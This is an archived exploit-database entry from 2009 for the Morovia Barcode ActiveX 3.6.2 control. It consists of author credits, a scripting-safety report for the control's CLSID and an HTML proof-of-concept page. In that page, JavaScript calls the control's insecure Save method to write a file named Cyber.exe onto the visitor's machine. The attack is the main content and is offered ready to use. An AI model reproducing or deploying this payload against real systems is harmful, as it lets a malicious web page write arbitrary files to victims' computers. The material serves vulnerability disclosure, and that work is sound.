Morovia Barcode ActiveX 3.6.2 - 'MrvBarCd.dll' Insecure Method

EDB-ID:

8208

CVE:



Platform:

Windows

Published:

2009-03-13

<HTML>
Morovia Barcode ActiveX Control 3.6.2 (MrvBarCd.dll) Insecure Method Exploit<br>
<br>
 Description There is Insecure Method in (Save) fonction<br>
Download Product : http://download.morovia.com/demo/MrvBarCd_Demo_V3.4.0.0.msi<br>
Found By : Cyber-Zone<br>
Tested Under : sp2 fr <br>
E-mail : Paradis_des_fous@hotmail.fr<br>
Home : WwW.IQ-Ty.CoM , WwW.No-Exploit.CoM<br>
SP thnx To : Hussin X , Jiko ( Che7ta4Ever My Best Friend ) No-Exploit TeaM , StaCk ( Thanx4Help ) ...All Mgharba ...
<!--
Report for Clsid: {18B409DA-241A-4BD8-AC69-B5D547D5B141}
RegKey Safe for Script: True
RegKey Safe for Init: True
Implements IObjectSafety: True
IDisp Safe:  Safe for untrusted: caller,data  
IPersist Safe:  Safe for untrusted: caller,data  
IPStorage Safe:  Safe for untrusted: caller,data  
-->

<title>Exploited By : Cyber-Zone </title>
<BODY>
 <object id=cyber classid="clsid:{18B409DA-241A-4BD8-AC69-B5D547D5B141}"></object>

<SCRIPT>

function Do_it()
 {
     File = "Cyber.exe"
   cyber.Save(File)
 }

</SCRIPT>
<input language=JavaScript onclick=Do_it() type=button value="Click here To Test"><br>
</body>
</HTML>

# milw0rm.com [2009-03-13]